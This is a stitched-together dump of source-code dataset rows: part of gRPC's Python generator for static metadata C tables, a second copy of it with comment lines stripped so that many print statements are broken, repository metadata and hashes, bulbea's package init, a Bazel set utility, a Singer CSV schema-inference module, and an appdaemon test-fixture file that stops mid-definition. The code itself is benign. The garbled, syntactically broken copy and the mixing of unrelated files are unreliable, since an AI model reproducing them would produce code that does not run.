GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;' print >> C, '}' print >> C print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {' for a, b in all_elems: print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b))) print >> C, '};' print >> H, 'typedef enum {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' %s,' % mangle(elem, 'batch').upper() print >> H, ' GRPC_BATCH_CALLOUTS_COUNT' print >> H, '} grpc_metadata_batch_callouts_index;' print >> H print >> H, 'typedef union {' print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];' print >> H, ' struct {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower() print >> H, ' } named;' print >> H, '} grpc_metadata_batch_callouts;' print >> H print >> H, '#define GRPC_BATCH_INDEX_OF(slice) \\' print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)' print >> H print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems) print >> C, '};' print >> C print >> H, '#define GRPC_MDELEM_ACCEPT_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))' print >> H print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join( '%d' % md_idx(elem) for elem in stream_compression_elems) print >> C, '};' print >> H, '#define GRPC_MDELEM_ACCEPT_STREAM_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_stream_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))' print >> H, '#endif /* GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H */' H.close() C.close()
30.773554
204
0.591363
import hashlib import itertools import collections import os import sys import subprocess import re import perfection CONFIG = [ 'host', 'grpc-timeout', 'grpc-internal-encoding-request', 'grpc-internal-stream-encoding-request', 'grpc-payload-bin', ':path', 'grpc-encoding', 'grpc-accept-encoding', 'user-agent', ':authority', 'grpc-message', 'grpc-status', 'grpc-server-stats-bin', 'grpc-tags-bin', 'grpc-trace-bin', 'grpc-previous-rpc-attempts', 'grpc-retry-pushback-ms', '1', '2', '3', '4', '', 'grpc.wait_for_ready', 'grpc.timeout', 'grpc.max_request_message_bytes', 'grpc.max_response_message_bytes', '/grpc.lb.v1.LoadBalancer/BalanceLoad', 'deflate', 'gzip', 'stream/gzip', (':authority', ''), (':method', 'GET'), (':method', 'POST'), (':path', '/'), (':path', '/index.html'), (':scheme', 'http'), (':scheme', 'https'), (':status', '200'), (':status', '204'), (':status', '206'), (':status', '304'), (':status', '400'), (':status', '404'), (':status', '500'), ('accept-charset', ''), ('accept-encoding', 'gzip, deflate'), ('accept-language', ''), ('accept-ranges', ''), ('accept', ''), ('access-control-allow-origin', ''), ('age', ''), ('allow', ''), ('authorization', ''), ('cache-control', ''), ('content-disposition', ''), ('content-encoding', ''), ('content-language', ''), ('content-length', ''), ('content-location', ''), ('content-range', ''), ('content-type', ''), ('cookie', ''), ('date', ''), ('etag', ''), ('expect', ''), ('expires', ''), ('from', ''), ('host', ''), ('if-match', ''), ('if-modified-since', ''), ('if-none-match', ''), ('if-range', ''), ('if-unmodified-since', ''), ('last-modified', ''), ('link', ''), ('location', ''), ('max-forwards', ''), ('proxy-authenticate', ''), ('proxy-authorization', ''), ('range', ''), ('referer', ''), ('refresh', ''), ('retry-after', ''), ('server', ''), ('set-cookie', ''), ('strict-transport-security', ''), ('transfer-encoding', ''), ('user-agent', ''), ('vary', ''), ('via', ''), ('www-authenticate', ''), ('grpc-status', '0'), ('grpc-status', '1'), ('grpc-status', '2'), ('grpc-encoding', 'identity'), ('grpc-encoding', 'gzip'), ('grpc-encoding', 'deflate'), ('te', 'trailers'), ('content-type', 'application/grpc'), (':scheme', 'grpc'), (':method', 'PUT'), ('accept-encoding', ''), ('content-encoding', 'identity'), ('content-encoding', 'gzip'), ('lb-token', ''), ('lb-cost-bin', ''), ] METADATA_BATCH_CALLOUTS = [ (':path'), (':method'), (':status'), (':authority'), (':scheme'), ('te'), ('grpc-message'), ('grpc-status'), ('grpc-payload-bin'), ('grpc-encoding'), ('grpc-accept-encoding'), ('grpc-server-stats-bin'), ('grpc-tags-bin'), ('grpc-trace-bin'), ('content-type'), ('content-encoding'), ('accept-encoding'), ('grpc-internal-encoding-request'), ('grpc-internal-stream-encoding-request'), ('user-agent'), ('host'), ('lb-token'), ('grpc-previous-rpc-attempts'), ('grpc-retry-pushback-ms'), ] COMPRESSION_ALGORITHMS = [ 'identity', 'deflate', 'gzip', ] STREAM_COMPRESSION_ALGORITHMS = [ 'identity', 'gzip', ] def mangle(elem, name=None): xl = { '-': '_', ':': '', '/': 'slash', '.': 'dot', ',': 'comma', ' ': '_', } def m0(x): if not x: return 'empty' r = '' for c in x: put = xl.get(c, c.lower()) if not put: continue last_is_underscore = r[-1] == '_' if r else True if last_is_underscore and put == '_': continue elif len(put) > 1: if not last_is_underscore: r += '_' r += put r += '_' else: r += put if r[-1] == '_': r = r[:-1] return r def n(default, name=name): if name is None: return 'grpc_%s_' % default if name == '': return '' return 'grpc_%s_' % name if isinstance(elem, tuple): return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1])) else: return '%s%s' % (n('mdstr'), m0(elem)) def fake_hash(elem): return hashlib.md5(elem).hexdigest()[0:8] def put_banner(files, banner): for f in files: print >> f, '/*' for line in banner: print >> f, ' * %s' % line print >> f, ' */' print >> f all_strs = list() all_elems = list() static_userdata = {} for elem in METADATA_BATCH_CALLOUTS: if elem not in all_strs: all_strs.append(elem) for elem in CONFIG: if isinstance(elem, tuple): if elem[0] not in all_strs: all_strs.append(elem[0]) if elem[1] not in all_strs: all_strs.append(elem[1]) if elem not in all_elems: all_elems.append(elem) else: if elem not in all_strs: all_strs.append(elem) compression_elems = [] for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)): val = ','.join(COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('grpc-accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) stream_compression_elems = [] for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)): val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) stream_compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) args = sys.argv[1:] H = None C = None D = None if args: if 'header' in args: H = sys.stdout else: H = open('/dev/null', 'w') if 'source' in args: C = sys.stdout else: C = open('/dev/null', 'w') if 'dictionary' in args: D = sys.stdout else: D = open('/dev/null', 'w') else: H = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../src/core/lib/transport/static_metadata.h'), 'w') C = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../src/core/lib/transport/static_metadata.cc'), 'w') D = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w') with open(sys.argv[0]) as my_source: copyright = [] for line in my_source: if line[0] != '#': break for line in my_source: if line[0] == '#': copyright.append(line) break for line in my_source: if line[0] != '#': break copyright.append(line) put_banner([H, C], [line[2:].rstrip() for line in copyright]) hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789'] def esc_dict(line): out = "\"" for c in line: if 32 <= c < 127: if c != ord('"'): out += chr(c) else: out += "\\\"" else: out += '\\x%02X' % c return out + "\"" put_banner([H, C], """WARNING: Auto-generated code. To make changes to this file, change tools/codegen/core/gen_static_metadata.py, and then re-run it. See metadata.h for an explanation of the interface here, and metadata.cc for an explanation of what's going on. """.splitlines()) print >> H, ' print >> H, ' print >> H print >> H, ' print >> H print >> H, ' print >> H print >> C, ' print >> C print >> C, ' print >> C print >> C, ' print >> C str_ofs = 0 id2strofs = {} for i, elem in enumerate(all_strs): id2strofs[i] = str_ofs str_ofs += len(elem) def slice_def(i): return ('{&grpc_static_metadata_refcounts[%d],' ' {{g_bytes+%d, %d}}}') % (i, id2strofs[i], len(all_strs[i])) # validate configuration for elem in METADATA_BATCH_CALLOUTS: assert elem in all_strs print >> H, ' print >> H, ('extern const grpc_slice ' 'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];') for i, elem in enumerate(all_strs): print >> H, '/* "%s" */' % elem print >> H, ' mangle(elem).upper(), i) print >> H print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join( '%d' % ord(c) for c in ''.join(all_strs))) print >> C print >> C, 'static void static_ref(void *unused) {}' print >> C, 'static void static_unref(void *unused) {}' print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = ' '{static_ref, static_unref, grpc_slice_default_eq_impl, ' 'grpc_slice_default_hash_impl};') print >> H, ('extern const grpc_slice_refcount_vtable ' 'grpc_static_metadata_vtable;') print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = ' '{static_ref, static_unref, grpc_static_slice_eq, ' 'grpc_static_slice_hash};') print >> C, ('static grpc_slice_refcount static_sub_refcnt = ' '{&static_sub_vtable, &static_sub_refcnt};') print >> H, ('extern grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];') print >> C, ('grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {') for i, elem in enumerate(all_strs): print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},' print >> C, '};' print >> C print >> H, ' print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == ' '&grpc_static_metadata_vtable)') print >> H print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]' ' = {') for i, elem in enumerate(all_strs): print >> C, slice_def(i) + ',' print >> C, '};' print >> C print >> H, ' print >> H, (' ((int)((static_slice).refcount - ' 'grpc_static_metadata_refcounts))') print >> H print >> D, ' for i, elem in enumerate(all_strs): print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem])) for i, elem in enumerate(all_elems): print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] + [len(elem[1])] + [ord(c) for c in elem[1]])) print >> H, ' print >> H, ('extern grpc_mdelem_data ' 'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];') print >> H, ('extern uintptr_t ' 'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];') for i, elem in enumerate(all_elems): print >> H, '/* "%s": "%s" */' % elem print >> H, (' 'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i) print >> H print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] ' '= {') print >> C, ' %s' % ','.join( '%d' % static_userdata.get(elem, 0) for elem in all_elems) print >> C, '};' print >> C def str_idx(s): for i, s2 in enumerate(all_strs): if s == s2: return i def md_idx(m): for i, m2 in enumerate(all_elems): if m == m2: return i def offset_trials(mink): yield 0 for i in range(1, 100): for mul in [-1, 1]: yield mul * i def perfect_hash(keys, name): p = perfection.hash_parameters(keys) def f(i, p=p): i += p.offset x = i % p.t y = i / p.t return x + p.r[y] return { 'PHASHRANGE': p.t - 1 + max(p.r), 'PHASHNKEYS': len(p.slots), 'pyfunc': f, 'code': """ static const int8_t %(name)s_r[] = {%(r)s}; static uint32_t %(name)s_phash(uint32_t i) { i %(offset_sign)s= %(offset)d; uint32_t x = i %% %(t)d; uint32_t y = i / %(t)d; uint32_t h = x; if (y < GPR_ARRAY_SIZE(%(name)s_r)) { uint32_t delta = (uint32_t)%(name)s_r[y]; h += delta; } return h; } """ % { 'name': name, 'r': ','.join('%d' % (r if r is not None else 0) for r in p.r), 't': p.t, 'offset': abs(p.offset), 'offset_sign': '+' if p.offset > 0 else '-' } } elem_keys = [ str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems ] elem_hash = perfect_hash(elem_keys, 'elems') print >> C, elem_hash['code'] keys = [0] * int(elem_hash['PHASHRANGE']) idxs = [255] * int(elem_hash['PHASHNKEYS']) for i, k in enumerate(elem_keys): h = elem_hash['pyfunc'](k) assert keys[h] == 0 keys[h] = k idxs[h] = i print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join( '%d' % k for k in keys) print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join( '%d' % i for i in idxs) print >> C print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);' print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {' print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;' print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs) print >> C, ' uint32_t h = elems_phash(k);' print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;' print >> C, '}' print >> C print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {' for a, b in all_elems: print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b))) print >> C, '};' print >> H, 'typedef enum {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' %s,' % mangle(elem, 'batch').upper() print >> H, ' GRPC_BATCH_CALLOUTS_COUNT' print >> H, '} grpc_metadata_batch_callouts_index;' print >> H print >> H, 'typedef union {' print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];' print >> H, ' struct {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower() print >> H, ' } named;' print >> H, '} grpc_metadata_batch_callouts;' print >> H print >> H, ' print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)' print >> H print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems) print >> C, '};' print >> C print >> H, ' print >> H print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join( '%d' % md_idx(elem) for elem in stream_compression_elems) print >> C, '};' print >> H, ' print >> H, ' H.close() C.close()
true
true
f705aa0a9cc3013d4d6d764c543ef84eb33c842d
266
py
Python
bulbea/__init__.py
saimohithnaag/StockPredictor
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
[ "Apache-2.0" ]
1,761
2017-03-09T08:51:28.000Z
2022-03-27T18:15:06.000Z
bulbea/__init__.py
saimohithnaag/StockPredictor
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
[ "Apache-2.0" ]
38
2017-03-11T11:51:16.000Z
2021-06-27T15:00:07.000Z
bulbea/__init__.py
saimohithnaag/StockPredictor
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
[ "Apache-2.0" ]
511
2017-03-12T03:49:26.000Z
2022-03-15T23:05:49.000Z
# imports - compatibility packages from __future__ import absolute_import # module imports from bulbea.entity import Share, Stock from bulbea.config import AppConfig from bulbea.app import app from bulbea.learn import sentiment __version__ = AppConfig.VERSION
24.181818
38
0.819549
from __future__ import absolute_import from bulbea.entity import Share, Stock from bulbea.config import AppConfig from bulbea.app import app from bulbea.learn import sentiment __version__ = AppConfig.VERSION
true
true
f705aa3f869f15ac85f262ae3734bf3603f18c56
2,656
bzl
Python
haskell/set.bzl
iphydf/rules_haskell
546c698cb782fd0749a3c91eb41e1f9a19c65646
[ "Apache-2.0" ]
null
null
null
haskell/set.bzl
iphydf/rules_haskell
546c698cb782fd0749a3c91eb41e1f9a19c65646
[ "Apache-2.0" ]
null
null
null
haskell/set.bzl
iphydf/rules_haskell
546c698cb782fd0749a3c91eb41e1f9a19c65646
[ "Apache-2.0" ]
null
null
null
"""Immutable sets that support efficient merging, traversal, and membership check. """ def _empty(): """Create an empty set. Returns: set, new empty set. """ return struct(_set_items = dict()) def _is_member(s, e): """Return true if `e` is in the set `s`. Args: s: The set to inspect. e: The element to search for. Result: Bool, true if `e` is in `s`, false otherwise. """ return e in s._set_items def _insert(s, e): """Insert an element into the set. Args: s: Set to insert new element into. e: The element to insert. Result: A copy of set `s` with `s` element added. """ r = dict(s._set_items) r[e] = None return struct(_set_items = r) def _mutable_insert(s, e): """The same as `set.insert`, but modifies the first argument in place. Args: s: Set to insert new element into. e: The element to insert. Result: set `s` with `s` element added. """ s._set_items[e] = None return s def _union(s0, s1): """Return union of two sets. Args: s0: One set. s1: Another set. Result: set, union of the two sets. """ r = dict(s0._set_items) r.update(s1._set_items) return struct(_set_items = r) def _mutable_union(s0, s1): """Modify set `s0` adding elements from `s1` to it. Args: s0: One set. s1: Another set. Result: set, union of the two sets. """ s0._set_items.update(s1._set_items) return s0 def _map(s, f): """Map elements of given set using a function. Args: s: Original set. f: Function to apply to elements of the set. Result: set with elements obtained by application of function `f` to the elements of `s`. """ return struct(_set_items = { f(x): None for x in s._set_items.keys()}) def _from_list(l): """Create a set containing elements from given list. Args: l: List, source of the elements for the new set. Result: set containing elements from given list. """ return (struct(_set_items = { x: None for x in l })) def _to_list(s): """Convert set into a list of its elements. Args: s: Set to convert. Returns: List of elements of the set. """ return s._set_items.keys() def _to_depset(s): """Similar to `set.to_list`, but produces a depset. Args: s: Set to convert. Returns: Depset of elements from the set. """ return depset(_to_list(s)) set = struct( empty = _empty, is_member = _is_member, insert = _insert, mutable_insert = _mutable_insert, union = _union, mutable_union = _mutable_union, map = _map, from_list = _from_list, to_list = _to_list, to_depset = _to_depset, )
19.386861
75
0.636672
def _empty(): return struct(_set_items = dict()) def _is_member(s, e): return e in s._set_items def _insert(s, e): r = dict(s._set_items) r[e] = None return struct(_set_items = r) def _mutable_insert(s, e): s._set_items[e] = None return s def _union(s0, s1): r = dict(s0._set_items) r.update(s1._set_items) return struct(_set_items = r) def _mutable_union(s0, s1): s0._set_items.update(s1._set_items) return s0 def _map(s, f): return struct(_set_items = { f(x): None for x in s._set_items.keys()}) def _from_list(l): return (struct(_set_items = { x: None for x in l })) def _to_list(s): return s._set_items.keys() def _to_depset(s): return depset(_to_list(s)) set = struct( empty = _empty, is_member = _is_member, insert = _insert, mutable_insert = _mutable_insert, union = _union, mutable_union = _mutable_union, map = _map, from_list = _from_list, to_list = _to_list, to_depset = _to_depset, )
true
true
f705aa53c6355389b32f15c7666bdf8d321b755f
5,052
py
Python
singer_encodings/json_schema.py
INGCRENGIFO/singer-encodings
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
[ "Apache-2.0" ]
null
null
null
singer_encodings/json_schema.py
INGCRENGIFO/singer-encodings
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
[ "Apache-2.0" ]
null
null
null
singer_encodings/json_schema.py
INGCRENGIFO/singer-encodings
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
[ "Apache-2.0" ]
1
2021-05-25T14:00:25.000Z
2021-05-25T14:00:25.000Z
import re from . import csv SDC_SOURCE_FILE_COLUMN = "_sdc_source_file" SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno" # TODO: Add additional logging # TODO: conn needs get_files and get_file_handle functions def get_schema_for_table(conn, table_spec): files = conn.get_files(table_spec['search_prefix'], table_spec['search_pattern']) if not files: return {} samples = sample_files(conn, table_spec, files) data_schema = { **generate_schema(samples, table_spec), SDC_SOURCE_FILE_COLUMN: {'type': 'string'}, SDC_SOURCE_LINENO_COLUMN: {'type': 'integer'}, csv.SDC_EXTRA_COLUMN: {'type': 'array', 'items': {'type': 'string'}}, } return { 'type': 'object', 'properties': data_schema, } def sample_file(conn, table_spec, f, sample_rate, max_records): table_name = table_spec['table_name'] plurality = "s" if sample_rate != 1 else "" samples = [] file_handle = conn.get_file_handle(f) # Add file_name to opts and flag infer_compression to support gzipped files opts = {'key_properties': table_spec['key_properties'], 'delimiter': table_spec['delimiter'], 'encoding': table_spec.get('encoding', 'utf-8'), 'file_name': f['filepath']} readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True) for reader in readers: current_row = 0 for row in reader: if (current_row % sample_rate) == 0: if row.get(csv.SDC_EXTRA_COLUMN): row.pop(csv.SDC_EXTRA_COLUMN) samples.append(row) current_row += 1 if len(samples) >= max_records: break # Empty sample to show field selection, if needed empty_file = False if len(samples) == 0: empty_file = True # Assumes all reader objects in readers have the same fieldnames samples.append({name: None for name in reader.fieldnames}) return (empty_file, samples) # pylint: disable=too-many-arguments def sample_files(conn, table_spec, files, sample_rate=1, max_records=1000, max_files=5): to_return = [] empty_samples = [] files_so_far = 0 sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True) for f in sorted_files: empty_file, samples = sample_file(conn, table_spec, f, sample_rate, max_records) if empty_file: empty_samples += samples else: to_return += samples files_so_far += 1 if files_so_far >= max_files: break if not any(to_return): return empty_samples return to_return def infer(datum): """ Returns the inferred data type """ if datum is None or datum == '': return None try: int(datum) return 'integer' except (ValueError, TypeError): pass try: #numbers are NOT floats, they are DECIMALS float(datum) return 'number' except (ValueError, TypeError): pass return 'string' def count_sample(sample, counts, table_spec): for key, value in sample.items(): if key not in counts: counts[key] = {} date_overrides = table_spec.get('date_overrides', []) if key in date_overrides: datatype = "date-time" else: datatype = infer(value) if datatype is not None: counts[key][datatype] = counts[key].get(datatype, 0) + 1 return counts def pick_datatype(counts): """ If the underlying records are ONLY of type `integer`, `number`, or `date-time`, then return that datatype. If the underlying records are of type `integer` and `number` only, return `number`. Otherwise return `string`. """ to_return = 'string' if counts.get('date-time', 0) > 0: return 'date-time' if len(counts) == 1: if counts.get('integer', 0) > 0: to_return = 'integer' elif counts.get('number', 0) > 0: to_return = 'number' elif(len(counts) == 2 and counts.get('integer', 0) > 0 and counts.get('number', 0) > 0): to_return = 'number' return to_return def generate_schema(samples, table_spec): counts = {} for sample in samples: # {'name' : { 'string' : 45}} counts = count_sample(sample, counts, table_spec) for key, value in counts.items(): datatype = pick_datatype(value) if datatype == 'date-time': counts[key] = { 'anyOf': [ {'type': ['null', 'string'], 'format': 'date-time'}, {'type': ['null', 'string']} ] } else: types = ['null', datatype] if datatype != 'string': types.append('string') counts[key] = { 'type': types, } return counts
26.87234
86
0.578583
import re from . import csv SDC_SOURCE_FILE_COLUMN = "_sdc_source_file" SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno" def get_schema_for_table(conn, table_spec): files = conn.get_files(table_spec['search_prefix'], table_spec['search_pattern']) if not files: return {} samples = sample_files(conn, table_spec, files) data_schema = { **generate_schema(samples, table_spec), SDC_SOURCE_FILE_COLUMN: {'type': 'string'}, SDC_SOURCE_LINENO_COLUMN: {'type': 'integer'}, csv.SDC_EXTRA_COLUMN: {'type': 'array', 'items': {'type': 'string'}}, } return { 'type': 'object', 'properties': data_schema, } def sample_file(conn, table_spec, f, sample_rate, max_records): table_name = table_spec['table_name'] plurality = "s" if sample_rate != 1 else "" samples = [] file_handle = conn.get_file_handle(f) opts = {'key_properties': table_spec['key_properties'], 'delimiter': table_spec['delimiter'], 'encoding': table_spec.get('encoding', 'utf-8'), 'file_name': f['filepath']} readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True) for reader in readers: current_row = 0 for row in reader: if (current_row % sample_rate) == 0: if row.get(csv.SDC_EXTRA_COLUMN): row.pop(csv.SDC_EXTRA_COLUMN) samples.append(row) current_row += 1 if len(samples) >= max_records: break empty_file = False if len(samples) == 0: empty_file = True samples.append({name: None for name in reader.fieldnames}) return (empty_file, samples) def sample_files(conn, table_spec, files, sample_rate=1, max_records=1000, max_files=5): to_return = [] empty_samples = [] files_so_far = 0 sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True) for f in sorted_files: empty_file, samples = sample_file(conn, table_spec, f, sample_rate, max_records) if empty_file: empty_samples += samples else: to_return += samples files_so_far += 1 if files_so_far >= max_files: break if not any(to_return): return empty_samples return to_return def infer(datum): if datum is None or datum == '': return None try: int(datum) return 'integer' except (ValueError, TypeError): pass try: float(datum) return 'number' except (ValueError, TypeError): pass return 'string' def count_sample(sample, counts, table_spec): for key, value in sample.items(): if key not in counts: counts[key] = {} date_overrides = table_spec.get('date_overrides', []) if key in date_overrides: datatype = "date-time" else: datatype = infer(value) if datatype is not None: counts[key][datatype] = counts[key].get(datatype, 0) + 1 return counts def pick_datatype(counts): to_return = 'string' if counts.get('date-time', 0) > 0: return 'date-time' if len(counts) == 1: if counts.get('integer', 0) > 0: to_return = 'integer' elif counts.get('number', 0) > 0: to_return = 'number' elif(len(counts) == 2 and counts.get('integer', 0) > 0 and counts.get('number', 0) > 0): to_return = 'number' return to_return def generate_schema(samples, table_spec): counts = {} for sample in samples: counts = count_sample(sample, counts, table_spec) for key, value in counts.items(): datatype = pick_datatype(value) if datatype == 'date-time': counts[key] = { 'anyOf': [ {'type': ['null', 'string'], 'format': 'date-time'}, {'type': ['null', 'string']} ] } else: types = ['null', datatype] if datatype != 'string': types.append('string') counts[key] = { 'type': types, } return counts
true
true
f705aa7a111c288e8e1467878b55832e0ecc8a3a
6,992
py
Python
appdaemontestframework/automation_fixture.py
fhoekstra/Appdaemon-Test-Framework
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
[ "MIT" ]
37
2018-08-08T10:48:13.000Z
2022-03-09T22:31:11.000Z
appdaemontestframework/automation_fixture.py
fhoekstra/Appdaemon-Test-Framework
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
[ "MIT" ]
58
2018-10-05T13:36:57.000Z
2022-02-06T11:37:20.000Z
appdaemontestframework/automation_fixture.py
fhoekstra/Appdaemon-Test-Framework
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
[ "MIT" ]
13
2018-12-04T19:22:23.000Z
2022-02-06T10:32:04.000Z
import warnings from inspect import isfunction, signature import pkg_resources import pytest from appdaemon.plugins.hass.hassapi import Hass from appdaemontestframework.common import AppdaemonTestFrameworkError class AutomationFixtureError(AppdaemonTestFrameworkError): pass def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks): _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks) automation = automation_class( None, automation_class.__name__, None, None, None, None, None ) automation.initialize() given_that.mock_functions_are_cleared() return automation def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks): injectable_fixtures = { 'given_that': given_that, 'hass_functions': hass_functions, 'hass_mocks': hass_mocks, } def _check_valid(param): if param not in injectable_fixtures: raise AutomationFixtureError( f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}") if param == 'hass_functions': warnings.warn( """ Injecting `hass_functions` into automation fixtures is deprecated. Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions` """, DeprecationWarning) args = [] for param in signature(function).parameters: _check_valid(param) args.append(injectable_fixtures.get(param)) function(*tuple(args)) def ensure_automation_is_valid(automation_class): def function_exist_in_automation_class(func_name): return func_name in dir(automation_class) def function_has_arguments_other_than_self(func_name): func_parameters = signature(getattr(automation_class, func_name)).parameters return list(func_parameters.keys()) != ["self"] def __init___was_overridden(): return '__init__' in automation_class.__dict__ # noinspection PyPep8Naming,SpellCheckingInspection def not_subclass_of_Hass(): return not issubclass(automation_class, Hass) if not function_exist_in_automation_class('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' has no 'initialize' function! Make sure you implemented it!") if function_has_arguments_other_than_self('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' 'initialize' should have no arguments other than 'self'!") if __init___was_overridden(): raise AutomationFixtureError(f"'{automation_class.__name__}' should not override '__init__'") if not_subclass_of_Hass(): raise AutomationFixtureError(f"'{automation_class.__name__}' should be a subclass of 'Hass'") class _AutomationFixtureDecoratorWithoutArgs: def __init__(self, automation_classes): self.automation_classes = automation_classes for automation in self.automation_classes: ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes, 